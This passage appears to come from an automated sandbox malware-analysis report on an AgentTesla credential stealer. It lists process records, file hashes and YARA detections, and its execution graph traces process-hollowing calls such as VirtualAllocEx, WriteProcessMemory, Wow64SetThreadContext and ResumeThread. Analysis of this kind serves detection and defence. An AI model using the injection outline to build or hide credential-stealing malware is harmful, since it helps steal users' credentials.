                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                          Imagebase:0xed0000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3307025913.0000000003348000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3307025913.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3307025913.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:15
                                                          Start time:15:02:13
                                                          Start date:29/03/2024
                                                          Path:C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe"
                                                          Imagebase:0x690000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          • Detection: 0%, Virustotal, Browse
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:15:02:13
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:15:02:22
                                                          Start date:29/03/2024
                                                          Path:C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe"
                                                          Imagebase:0x7e0000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:15:02:22
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:10.7%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:2.4%
                                                            Total number of Nodes:382
                                                            Total number of Limit Nodes:15
                                                            execution_graph 38299 edd01c 38300 edd034 38299->38300 38301 edd08e 38300->38301 38306 2db1ea8 38300->38306 38310 2db1e98 38300->38310 38314 2db2bb9 38300->38314 38327 2db0ad4 38300->38327 38307 2db1ece 38306->38307 38308 2db0ad4 5 API calls 38307->38308 38309 2db1eef 38308->38309 38309->38301 38311 2db1ea8 38310->38311 38312 2db0ad4 5 API calls 38311->38312 38313 2db1eef 38312->38313 38313->38301 38316 2db2c02 38314->38316 38315 2db2c79 38368 2db0bfc 38315->38368 38316->38315 38319 2db2c69 38316->38319 38318 2db2c77 38320 2db2cd3 38318->38320 38375 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38318->38375 38340 2db2e6c 38319->38340 38346 2db2d91 38319->38346 38357 2db2da0 38319->38357 38322 2db2ceb 38320->38322 38376 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38320->38376 38328 2db0adf 38327->38328 38329 2db2c79 38328->38329 38332 2db2c69 38328->38332 38330 2db0bfc 5 API calls 38329->38330 38331 2db2c77 38330->38331 38333 2db2cd3 38331->38333 38392 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38331->38392 38337 2db2e6c 5 API calls 38332->38337 38338 2db2d91 5 API calls 38332->38338 38339 2db2da0 5 API calls 38332->38339 38335 2db2ceb 38333->38335 38393 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38333->38393 38337->38331 38338->38331 38339->38331 38341 2db2e7a 38340->38341 38342 2db2e2a 38340->38342 38377 2db2e58 38342->38377 38380 2db2e47 38342->38380 38343 2db2e40 38343->38318 38347 2db2db4 38346->38347 38348 2db2dce 38346->38348 38352 2db2dcc 38347->38352 38386 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38347->38386 38348->38352 38387 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38348->38387 38351 2db2e40 38351->38318 38355 2db2e58 5 API calls 38352->38355 38356 2db2e47 5 API calls 38352->38356 38353 2db2deb 38353->38352 38388 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38353->38388 38355->38351 38356->38351 38358 2db2db4 38357->38358 38359 2db2dce 38357->38359 38363 2db2dcc 38358->38363 38389 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38358->38389 38359->38363 38390 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38359->38390 38362 2db2e40 38362->38318 38366 2db2e58 5 API calls 38363->38366 38367 2db2e47 5 API calls 38363->38367 38364 2db2deb 38364->38363 38391 2db0bd5 CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW CallWindowProcW 38364->38391 38366->38362 38367->38362 38373 2db0bd5 38368->38373 38369 2db43ac 38372 2db0ad4 4 API calls 38369->38372 38370 2db4302 38371 2db435a CallWindowProcW 38370->38371 38374 2db4309 38370->38374 38371->38374 38372->38374 38373->38369 38373->38370 38374->38318 38375->38320 38376->38322 38378 2db2e69 38377->38378 38383 2db429e 38377->38383 38378->38343 38381 2db2e69 38380->38381 38382 2db429e 5 API calls 38380->38382 38381->38343 38382->38381 38384 2db0bfc 5 API calls 38383->38384 38385 2db42aa 38384->38385 38385->38378 38386->38352 38387->38353 38388->38352 38389->38363 38390->38364 38391->38363 38392->38333 38393->38335 38232 10a4668 38233 10a467a 38232->38233 38234 10a4686 38233->38234 38238 10a4779 38233->38238 38243 10a3e1c 38234->38243 38236 10a46a5 38239 10a479d 38238->38239 38247 10a4878 38239->38247 38251 10a4888 38239->38251 38244 10a3e27 38243->38244 38259 10a5c1c 38244->38259 38246 10a6ff0 38246->38236 38248 10a48af 38247->38248 38249 10a498c 38248->38249 38255 10a449c 38248->38255 38253 10a48af 38251->38253 38252 10a498c 38252->38252 38253->38252 38254 10a449c CreateActCtxA 38253->38254 38254->38252 38256 10a5918 CreateActCtxA 38255->38256 38258 10a59db 38256->38258 38260 10a5c27 38259->38260 38263 10a5c3c 38260->38263 38262 10a7095 38262->38246 38264 10a5c47 38263->38264 38267 10a5c6c 38264->38267 38266 10a717a 38266->38262 38268 10a5c77 38267->38268 38269 10a5c9c CreateWindowExW 38268->38269 38270 10a726d 38269->38270 38270->38266 38394 10aad38 38395 10aad47 38394->38395 38398 10aae30 38394->38398 38406 10aae21 38394->38406 38399 10aae41 38398->38399 38400 10aae64 38398->38400 38399->38400 38414 10ab0b8 38399->38414 38418 10ab0c8 38399->38418 38400->38395 38401 10aae5c 38401->38400 38402 10ab068 GetModuleHandleW 38401->38402 38403 10ab095 38402->38403 38403->38395 38407 10aae41 38406->38407 38408 10aae64 38406->38408 38407->38408 38412 10ab0b8 LoadLibraryExW 38407->38412 38413 10ab0c8 LoadLibraryExW 38407->38413 38408->38395 38409 10aae5c 38409->38408 38410 10ab068 GetModuleHandleW 38409->38410 38411 10ab095 38410->38411 38411->38395 38412->38409 38413->38409 38415 10ab0dc 38414->38415 38416 10ab101 38415->38416 38422 10aa870 38415->38422 38416->38401 38419 10ab0dc 38418->38419 38420 10aa870 LoadLibraryExW 38419->38420 38421 10ab101 38419->38421 38420->38421 38421->38401 38423 10ab2a8 LoadLibraryExW 38422->38423 38425 10ab321 38423->38425 38425->38416 38426 10ad0b8 38427 10ad0fe GetCurrentProcess 38426->38427 38429 10ad149 38427->38429 38430 10ad150 GetCurrentThread 38427->38430 38429->38430 38431 10ad18d GetCurrentProcess 38430->38431 38432 10ad186 38430->38432 38433 10ad1c3 38431->38433 38432->38431 38434 10ad1eb GetCurrentThreadId 38433->38434 38435 10ad21c 38434->38435 38172 2db8cce 38173 2db8cd0 38172->38173 38176 2db6e64 38173->38176 38175 2db8cdf 38177 2db6e69 38176->38177 38178 2db8d12 38177->38178 38180 10a5c9c 38177->38180 38178->38175 38181 10a5ca7 38180->38181 38182 10a8691 38181->38182 38184 10acdf4 38181->38184 38182->38178 38185 10ace11 38184->38185 38186 10ace35 38185->38186 38189 10acf8f 38185->38189 38193 10acfa0 38185->38193 38186->38182 38190 10acfad 38189->38190 38192 10acfe7 38190->38192 38197 10ac8d8 38190->38197 38192->38186 38195 10acfad 38193->38195 38194 10acfe7 38194->38186 38195->38194 38196 10ac8d8 CreateWindowExW 38195->38196 38196->38194 38198 10ac8dd 38197->38198 38200 10ad8f8 38198->38200 38201 10aca04 38198->38201 38200->38200 38202 10aca0f 38201->38202 38203 10a5c9c CreateWindowExW 38202->38203 38204 10ad967 38203->38204 38208 10af6e0 38204->38208 38214 10af6c8 38204->38214 38205 10ad9a1 38205->38200 38210 10af711 38208->38210 38211 10af811 38208->38211 38209 10af71d 38209->38205 38210->38209 38219 2db0dc8 38210->38219 38223 2db0db8 38210->38223 38211->38205 38216 10af6dd 38214->38216 38215 10af71d 38215->38205 38216->38215 38217 2db0dc8 CreateWindowExW 38216->38217 38218 2db0db8 CreateWindowExW 38216->38218 38217->38215 38218->38215 38220 2db0df3 38219->38220 38221 2db0ea2 38220->38221 38227 2db1b92 38220->38227 38224 2db0df3 38223->38224 38225 2db0ea2 38224->38225 38226 2db1b92 CreateWindowExW 38224->38226 38226->38225 38229 2db1c33 38227->38229 38228 2db1cd0 38228->38221 38229->38228 38230 2db1db3 CreateWindowExW 38229->38230 38231 2db1e14 38230->38231 37956 10ad300 DuplicateHandle 37957 10ad396 37956->37957 38271 2db7030 38272 2db705d 38271->38272 38283 2db6cc8 38272->38283 38274 2db711a 38275 2db6cc8 CreateWindowExW 38274->38275 38276 2db714c 38275->38276 38287 2db6cd8 38276->38287 38279 2db6cd8 CreateWindowExW 38280 2db71b0 38279->38280 38291 2db6ce8 38280->38291 38282 2db71e2 38284 2db6cd3 38283->38284 38286 10a5c9c CreateWindowExW 38284->38286 38285 2db7e73 38285->38274 38286->38285 38288 2db6ce3 38287->38288 38289 2db6e64 CreateWindowExW 38288->38289 38290 2db717e 38289->38290 38290->38279 38292 2db6cf3 38291->38292 38295 2dbe670 38292->38295 38294 2dbf857 38294->38282 38296 2dbe67b 38295->38296 38298 10a5c9c CreateWindowExW 38296->38298 38297 2dbf8dc 38297->38294 38298->38297 37958 7069b48 37960 7069b1c 37958->37960 37959 7069b2b 37960->37959 37964 706ca20 37960->37964 37982 706ca8e 37960->37982 38001 706ca30 37960->38001 37965 706ca30 37964->37965 37970 706ca6e 37965->37970 38019 706cfc6 37965->38019 38024 706d198 37965->38024 38028 706d0db 37965->38028 38033 706d4dc 37965->38033 38037 706d2b1 37965->38037 38042 706cfb1 37965->38042 38051 706d090 37965->38051 38057 706d5b2 37965->38057 38062 706ceb4 37965->38062 38066 706d00b 37965->38066 38074 706d04c 37965->38074 38079 706d22c 37965->38079 38084 706d103 37965->38084 38089 706d362 37965->38089 38095 706d3e6 37965->38095 37970->37960 37983 706ca1c 37982->37983 37984 706ca91 37982->37984 37985 706cfc6 2 API calls 37983->37985 37986 706d3e6 2 API calls 37983->37986 37987 706d362 3 API calls 37983->37987 37988 706d103 2 API calls 37983->37988 37989 706ca6e 37983->37989 37990 706d22c 2 API calls 37983->37990 37991 706d04c 2 API calls 37983->37991 37992 706d00b 4 API calls 37983->37992 37993 706ceb4 2 API calls 37983->37993 37994 706d5b2 2 API calls 37983->37994 37995 706d090 3 API calls 37983->37995 37996 706cfb1 4 API calls 37983->37996 37997 706d2b1 2 API calls 37983->37997 37998 706d4dc 2 API calls 37983->37998 37999 706d0db 2 API calls 37983->37999 38000 706d198 2 API calls 37983->38000 37984->37960 37985->37989 37986->37989 37987->37989 37988->37989 37989->37960 37990->37989 37991->37989 37992->37989 37993->37989 37994->37989 37995->37989 37996->37989 37997->37989 37998->37989 37999->37989 38000->37989 38002 706ca4a 38001->38002 38003 706cfc6 2 API calls 38002->38003 38004 706d3e6 2 API calls 38002->38004 38005 706d362 3 API calls 38002->38005 38006 706d103 2 API calls 38002->38006 38007 706ca6e 38002->38007 38008 706d22c 2 API calls 38002->38008 38009 706d04c 2 API calls 38002->38009 38010 706d00b 4 API calls 38002->38010 38011 706ceb4 2 API calls 38002->38011 38012 706d5b2 2 API calls 38002->38012 38013 706d090 3 API calls 38002->38013 38014 706cfb1 4 API calls 38002->38014 38015 706d2b1 2 API calls 38002->38015 38016 706d4dc 2 API calls 38002->38016 38017 706d0db 2 API calls 38002->38017 38018 706d198 2 API calls 38002->38018 38003->38007 38004->38007 38005->38007 38006->38007 38007->37960 38008->38007 38009->38007 38010->38007 38011->38007 38012->38007 38013->38007 38014->38007 38015->38007 38016->38007 38017->38007 38018->38007 38020 706cfcc 38019->38020 38099 706dada 38020->38099 38104 706dae8 38020->38104 38021 706d2e5 38021->37970 38117 70692e0 38024->38117 38121 70692d8 38024->38121 38025 706d1b2 38025->37970 38029 706d0e8 38028->38029 38029->37970 38030 706d6dd 38029->38030 38125 7069478 38029->38125 38129 7069473 38029->38129 38030->37970 38035 7069473 WriteProcessMemory 38033->38035 38036 7069478 WriteProcessMemory 38033->38036 38034 706d500 38035->38034 38036->38034 38038 706d2c9 38037->38038 38040 706dada 2 API calls 38038->38040 38041 706dae8 2 API calls 38038->38041 38039 706d2e5 38039->37970 38040->38039 38041->38039 38043 706d01d 38042->38043 38045 706cfb4 38042->38045 38133 7069560 38043->38133 38137 7069568 38043->38137 38044 706d641 38044->37970 38045->38044 38047 706dada 2 API calls 38045->38047 38048 706dae8 2 API calls 38045->38048 38046 706d2e5 38046->37970 38047->38046 38048->38046 38052 706d096 38051->38052 38141 7068d91 38052->38141 38146 7068df8 38052->38146 38150 7068df1 38052->38150 38053 706d0bc 38053->37970 38058 706d482 38057->38058 38058->37970 38059 706d6dd 38058->38059 38060 7069473 WriteProcessMemory 38058->38060 38061 7069478 WriteProcessMemory 38058->38061 38059->37970 38060->38058 38061->38058 38154 70696f4 38062->38154 38158 7069700 38062->38158 38068 706cfe4 38066->38068 38072 7069560 ReadProcessMemory 38066->38072 38073 7069568 ReadProcessMemory 38066->38073 38067 706d641 38067->37970 38068->38067 38070 706dada 2 API calls 38068->38070 38071 706dae8 2 API calls 38068->38071 38069 706d2e5 38069->37970 38070->38069 38071->38069 38072->38068 38073->38068 38075 706d06f 38074->38075 38077 7069473 WriteProcessMemory 38075->38077 38078 7069478 WriteProcessMemory 38075->38078 38076 706d216 38076->37970 38077->38076 38078->38076 38080 706cfe4 38079->38080 38082 706dada 2 API calls 38080->38082 38083 706dae8 2 API calls 38080->38083 38081 706d2e5 38081->37970 38082->38081 38083->38081 38085 706d104 38084->38085 38087 706dada 2 API calls 38085->38087 38088 706dae8 2 API calls 38085->38088 38086 706d2e5 38086->37970 38087->38086 38088->38086 38090 706d0a7 38089->38090 38091 706d0bc 38089->38091 38092 7068d91 ResumeThread 38090->38092 38093 7068df1 ResumeThread 38090->38093 38094 7068df8 ResumeThread 38090->38094 38091->37970 38092->38091 38093->38091 38094->38091 38162 706da92 38095->38162 38167 706daa0 38095->38167 38096 706d3fe 38100 706dae8 38099->38100 38109 70693b0 38100->38109 38113 70693b8 38100->38113 38101 706db1c 38101->38021 38105 706dafd 38104->38105 38107 70693b0 VirtualAllocEx 38105->38107 38108 70693b8 VirtualAllocEx 38105->38108 38106 706db1c 38106->38021 38107->38106 38108->38106 38110 70693b8 VirtualAllocEx 38109->38110 38112 7069435 38110->38112 38112->38101 38114 70693f8 VirtualAllocEx 38113->38114 38116 7069435 38114->38116 38116->38101 38118 7069325 Wow64SetThreadContext 38117->38118 38120 706936d 38118->38120 38120->38025 38122 70692e0 Wow64SetThreadContext 38121->38122 38124 706936d 38122->38124 38124->38025 38126 70694c0 WriteProcessMemory 38125->38126 38128 7069517 38126->38128 38128->38029 38130 7069478 WriteProcessMemory 38129->38130 38132 7069517 38130->38132 38132->38029 38134 7069568 ReadProcessMemory 38133->38134 38136 70695f7 38134->38136 38136->38045 38138 70695b3 ReadProcessMemory 38137->38138 38140 70695f7 38138->38140 38140->38045 38142 7068e08 ResumeThread 38141->38142 38143 7068d9f 38141->38143 38145 7068e69 38142->38145 38143->38053 38145->38053 38147 7068e08 ResumeThread 38146->38147 38149 7068e69 38147->38149 38149->38053 38151 7068df8 ResumeThread 38150->38151 38153 7068e69 38151->38153 38153->38053 38155 7069789 CreateProcessA 38154->38155 38157 706994b 38155->38157 38159 7069789 CreateProcessA 38158->38159 38161 706994b 38159->38161 38163 706dab5 38162->38163 38165 70692e0 Wow64SetThreadContext 38163->38165 38166 70692d8 Wow64SetThreadContext 38163->38166 38164 706dacb 38164->38096 38165->38164 38166->38164 38168 706dab5 38167->38168 38170 70692e0 Wow64SetThreadContext 38168->38170 38171 70692d8 Wow64SetThreadContext 38168->38171 38169 706dacb 38169->38096 38170->38169 38171->38169 38436 706dc78 38437 706de03 38436->38437 38438 706dc9e 38436->38438 38438->38437 38440 706c138 38438->38440 38441 706def8 PostMessageW 38440->38441 38442 706df64 38441->38442 38442->38438

                                                            Executed Functions

                                                            Function 02DB7030 Relevance: .8, Instructions: 843COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2104051173.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94c90d0ba96faa07918c9d031d914e963c3a7e207c8c64aa846bebfe870dbc2e
                                                            • Instruction ID: 84dbec704b788aa4b3bb379b9726eb0c10e471d3cfc39380f5a874ade6e06378
                                                            • Opcode Fuzzy Hash: 94c90d0ba96faa07918c9d031d914e963c3a7e207c8c64aa846bebfe870dbc2e
                                                            • Instruction Fuzzy Hash: 4792BE34A01218CFDB65DF68C894BD9B7B2EF8A301F1181E9D409AB365DB71AE85CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02DB702B Relevance: .8, Instructions: 793COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2104051173.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 315b0ed27803bf9d9107481361a79f933ebe1e408f981c7aab8ed448f241a0f0
                                                            • Instruction ID: 734e9fb0c20f474147d242976fb69272a5c06f6919b6b4bbaa1c377b1222c47b
                                                            • Opcode Fuzzy Hash: 315b0ed27803bf9d9107481361a79f933ebe1e408f981c7aab8ed448f241a0f0
                                                            • Instruction Fuzzy Hash: 7182BF34A01218CFDB65DF68C894BD9B7B2EF8A301F1181E9D409AB365DB71AE85CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07060031 Relevance: .3, Instructions: 268COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd7b7bf795c149f031a5a0586195ff51e08879aaffdc1be06f5dcb8e90fda68e
                                                            • Instruction ID: 16dff2a2c79b0d0d154c1a052a88bcbf49ba9ac8744cb666284e85758d7f8de0
                                                            • Opcode Fuzzy Hash: fd7b7bf795c149f031a5a0586195ff51e08879aaffdc1be06f5dcb8e90fda68e
                                                            • Instruction Fuzzy Hash: D9B1E4B0D55228CFEB64EFA5C859BEEBBF5BF4A300F00926AD419A7251DB740985CF01
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07060040 Relevance: .3, Instructions: 266COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bbadcfd90305420d2132d9bffad5de367561d300473b117928aebb3cbe5237ae
                                                            • Instruction ID: 9541abb0e9a0ef6517c09b2c4e942199876e478b322b3f08627d5be87426fb29
                                                            • Opcode Fuzzy Hash: bbadcfd90305420d2132d9bffad5de367561d300473b117928aebb3cbe5237ae
                                                            • Instruction Fuzzy Hash: C9B1D4B0D55228CFEB64EFA5C859BEDBBF5BF4A300F00926AD419A7251DB740985CF01
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0706A248 Relevance: .1, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b26b05c6af1919de4b18d779397d74602edc0c934255e3bbfb4b3776a397454c
                                                            • Instruction ID: 32015710ae227e20050288b6f2aa4cbda0f66fd742ccc09b2ff66dcd9cb7e86d
                                                            • Opcode Fuzzy Hash: b26b05c6af1919de4b18d779397d74602edc0c934255e3bbfb4b3776a397454c
                                                            • Instruction Fuzzy Hash: B3413CF0E69209CBDB04DFA5D5683EDBBFABF8A310F10E225E419B2250DB3449418B44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0706D221 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9abf69f5a42bab795eb07b8c29c0aa9cb7c885497c43cc4ec20d0e875e731d67
                                                            • Instruction ID: 190d846b39db7747e3c38709676f94e21b40c5954f2cf84d025faf567c808126
                                                            • Opcode Fuzzy Hash: 9abf69f5a42bab795eb07b8c29c0aa9cb7c885497c43cc4ec20d0e875e731d67
                                                            • Instruction Fuzzy Hash: 4CA002D4FAF048C9D4003C14053D4FDC53C030B404F50B30541AA3B1020950D800105D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010AD0A8 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 010AD136
                                                            • GetCurrentThread.KERNEL32 ref: 010AD173
                                                            • GetCurrentProcess.KERNEL32 ref: 010AD1B0
                                                            • GetCurrentThreadId.KERNEL32 ref: 010AD209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: c0e70e3f5859598e7d3b360cda3da3563f3d76bcfcaeffd6dab67e89f5f58134
                                                            • Instruction ID: 635cba70a1d484266213e9137ff49f72a01cd4452416ec86f1860ecc69d48366
                                                            • Opcode Fuzzy Hash: c0e70e3f5859598e7d3b360cda3da3563f3d76bcfcaeffd6dab67e89f5f58134
                                                            • Instruction Fuzzy Hash: 2D5165B0900749DFEB54DFAAD548BEEBBF1AF88314F20805EE049A7360D734A945CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010AD0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 010AD136
                                                            • GetCurrentThread.KERNEL32 ref: 010AD173
                                                            • GetCurrentProcess.KERNEL32 ref: 010AD1B0
                                                            • GetCurrentThreadId.KERNEL32 ref: 010AD209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 4e6433e45efadbccd51f372b9dae99b7757c186a06045e295b84cbe65d4cb01d
                                                            • Instruction ID: 031be111dbac671fb22490e9241e053e82694863632795c9d2db6c7fd29a8099
                                                            • Opcode Fuzzy Hash: 4e6433e45efadbccd51f372b9dae99b7757c186a06045e295b84cbe65d4cb01d
                                                            • Instruction Fuzzy Hash: 555154B0900709DFEB54DFAAD548BEEBBF1EB88314F20805DE109A7360D734A944CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02DB1B92 Relevance: 1.8, APIs: 1, Instructions: 264COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 45 2db1b92-2db1c31 46 2db1c7a-2db1c81 45->46 47 2db1c33-2db1c39 45->47 49 2db1c82-2db1c97 46->49 48 2db1c3b-2db1c51 47->48 47->49 50 2db1c9a-2db1c9f 48->50 51 2db1c53-2db1c59 48->51 49->50 53 2db1ca2-2db1cb8 50->53 52 2db1c5b-2db1c71 51->52 51->53 54 2db1cba-2db1cc0 52->54 55 2db1c73-2db1c79 52->55 53->54 56 2db1cc2-2db1cc8 54->56 55->46 55->56 57 2db1cca-2db1cce 56->57 58 2db1cd8-2db1ce4 57->58 59 2db1cd0 call 2db0aa8 57->59 58->57 61 2db1ce6-2db1d56 58->61 62 2db1cd5-2db1cd6 59->62 64 2db1d58-2db1d5e 61->64 65 2db1d61-2db1d68 61->65 64->65 66 2db1d6a-2db1d70 65->66 67 2db1d73-2db1e12 CreateWindowExW 65->67 66->67 69 2db1e1b-2db1e53 67->69 70 2db1e14-2db1e1a 67->70 74 2db1e60 69->74 75 2db1e55-2db1e58 69->75 70->69 76 2db1e61 74->76 75->74 76->76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2104051173.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58db9843a6f10268071c8ae72a3e36993c97eecf9a9c79255ace1eb8a328078c
                                                            • Instruction ID: e4037ef724bcf508bfe86ac91f9cf2143c25ecfbfc60696ecfd9ee5fea111b75
                                                            • Opcode Fuzzy Hash: 58db9843a6f10268071c8ae72a3e36993c97eecf9a9c79255ace1eb8a328078c
                                                            • Instruction Fuzzy Hash: 21914A71C08389DFCB16CFA5C8645CDBFB1EF4A310F1581AAE849AB262D3788845CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070696F4 Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
